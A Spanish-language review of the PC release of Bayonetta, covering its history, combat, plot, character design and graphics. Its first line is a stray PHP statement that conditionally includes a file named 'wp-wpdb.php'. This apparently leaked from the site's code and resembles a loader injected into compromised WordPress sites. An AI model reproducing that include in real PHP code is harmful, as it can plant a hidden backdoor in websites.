if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Bayonetta para PC – La Fortaleza de LeChuck

Análisis Bayonetta para PC

Bayonetta, el popular juego de Platinum, ha aterrizado en Steam. Hemos esperado muchos años para esta versión de PC pero realmente ha valido la pena. Vamos a rememorar las andanzas de nuestra particular bruja en su salto a ordenador.

Bayonetta fue lanzado por primera vez en Japón en 2009 y un año más tarde llegó a occidente en sus versiones de Xbox y PS3. El juego fue desarrollado por el prestigioso estudio japonés Platinum Games, que conoceréis por títulos como Nier: Automata, Vanquish o The Wonderful 101. El director de Bayonetta no es otro que Hideki Kamiya, un diseñador de juegos y el tuitero que, posiblemente, acumula el récord de usuarios bloqueados. Después de su paso por Capcom y Clover Studios, donde se despidió con el fantástico Okami, fundó Platinum Games junto a Atsushi Inaba y deslumbró con juegos como el que nos ocupa, Bayonetta, uno de los títulos más alabados por la prensa y la comunidad consiguiendo notas perfectas en diferentes medios. Las andanzas de la bruja no iban a acabar aquí, y tiempo después Nintendo rescató a la bruja del olvido y lanzó en 2014 Bayonetta 2 en exclusiva para Wii U.

Bayonetta es un hack and slash donde nuestra protagonista irá propinando patadas, puñetazos y tiros hacia una gran selección de monstruos caídos del cielo. Como viene siendo habitual en este género, existe una amplia cantidad de combos que surgen al hilar un determinado número de golpes y que nos brindarán actuaciones asombrosas. Un tutorial nos mostrará todo lo que Bayonetta es capaz de hacer para destrozar a sus enemigos. Ejecutar diferentes combinaciones y ver cómo los monstruos revientan es muy divertido.

Nuestra bruja tiene mucho estilo; se mueve de forma elegante y sugerente y así consigue que esquivar y reventar cráneos sea algo… bello. En cada episodio, el juego nos mostrará nuevos enemigos y jefes más duros, por lo tanto, tendremos que emplear nuestros ataques de forma más inteligente y evitar el machaqueo de botones sin sentido. Al acabar los episodios, el juego nos puntuará según nuestro desempeño en tiempo, combo y daño con el fin de que el jugador se supere.

Al avanzar, tendremos acceso a The Gates of Hell, la tienda de Rodin que nos proporcionará armas y objetos para la batalla, siempre y cuando tengamos suficientes anillos, la moneda del juego que dejarán caer nuestros enemigos y que recuerdan a los del erizo azul.

Bayonetta es mucho más que repartir tortas y hacer el cabra, el estudio ha apostado por crear una historia divertida e intensa. A diferencia de otros juegos del género, Bayonetta tiene altas dosis de cinemáticas que sumergirán al jugador tanto en los momentos dramáticos como en los desternillantes ofreciendo también un merecido descanso a nuestros deditos y periféricos. No obstante, algunas secuencias pueden resultar excesivamente largas para algunos jugadores, pero siempre estará disponible el «saltar» para volver a la acción. En cuanto al argumento, el juego reza lo siguiente:

Bayonetta. La última superviviente de un antiguo clan de brujas que mantiene el equilibrio entre la luz, la oscuridad y el caos. Bayonetta es descubierta tras 500 años encerrada en una tumba para protegerse a sí misma –y proteger nuestro mundo–, lo que desencadenará una serie de acontecimientos con repercusiones catastróficas.

Bayonetta se ve forzada de nuevo a combatir a pesar de no recordar su pasado, lo que la obligará a descubrir la verdad y luchar por su futuro. Su misión la llevará a enfrentarse a incontables y angelicales enemigos y gigantescos rivales para sobrevivir.

Kamiya ha comentado en repetidas ocasiones que el juego es la evolución natural de Devil May Cry, y si comparamos ambos, el primero realmente parece un concepto primitivo de Bayonetta. Sin embargo, como el diseñador japonés indica, si no hubiera habido DMC, no estaríamos disfrutando de Bayonetta, la perfección de la idea que creó hace unos años.

El motor que mueve a Bayonetta es la sexualidad. Para transmitir ese enfoque, el equipo creó un gran abanico de movimientos explícitos e imágenes elegantes y femeninas, como el uso de la mariposa en sus acrobacias y el traje que deja poco a la imaginación. Sin olvidar sus contoneos cuando dispara sus pistolas. Todo rezuma erotismo.

La diseñadora de personajes es Mari Shimazaki (Okami, Fire Emblem Fates, Soul Calibur V…) quien dibujó a los personajes bajo la premisa de hacerlos modernos y atractivos. En especial, Kamiya dio indicaciones a Shimazaki para que la protagonista también expresara misterio e inteligencia. El resultado fue Bayonetta, una bruja que utiliza su poder sexual de forma plenamente consciente como arma y forma de expresión, no como sumisión y objeto. Y aunque por algunas webs le cuelgan la etiqueta de personaje para el disfrute masculino, yo me sitúo en el bando que ve una protagonista muy bien ideada que se ríe de los que la tratan de fetiche. Al fin y al cabo, ella marca el ritmo y nos permite ver hasta donde podemos llegar, siendo meros seguidores de sus necesidades. Sin embargo, esta lectura choca con la de los creadores, que han expresado que buscaban curvas y una buena parte trasera, pero sea de forma intencionada o no, han creado un personaje sólido que parodia la figura de la protagonista hipersexualizada.

Gráficamente, el juego corre a 60fps aunque las cinemáticas están limitadas a 30fps. La versión para PC soporta resoluciones de hasta 4K e incluye un amplio menú para ajustar las opciones gráficas a todo tipo de ordenadores. No obstante, no deja de ser un juego de 2009, y en las texturas y los modelados se nota el paso del tiempo. Echad un ojo a la comparativa de Digital Foundry:

En definitiva, Bayonetta es uno de los mejores hack and slash de los últimos años y por fin llega a PC en una de las mejores adaptaciones de un juego de consola japonés. Un título contundente que no deja indiferente a nadie gracias a su estupenda protagonista y un humor marca de la casa que hace del juego un imprescindible.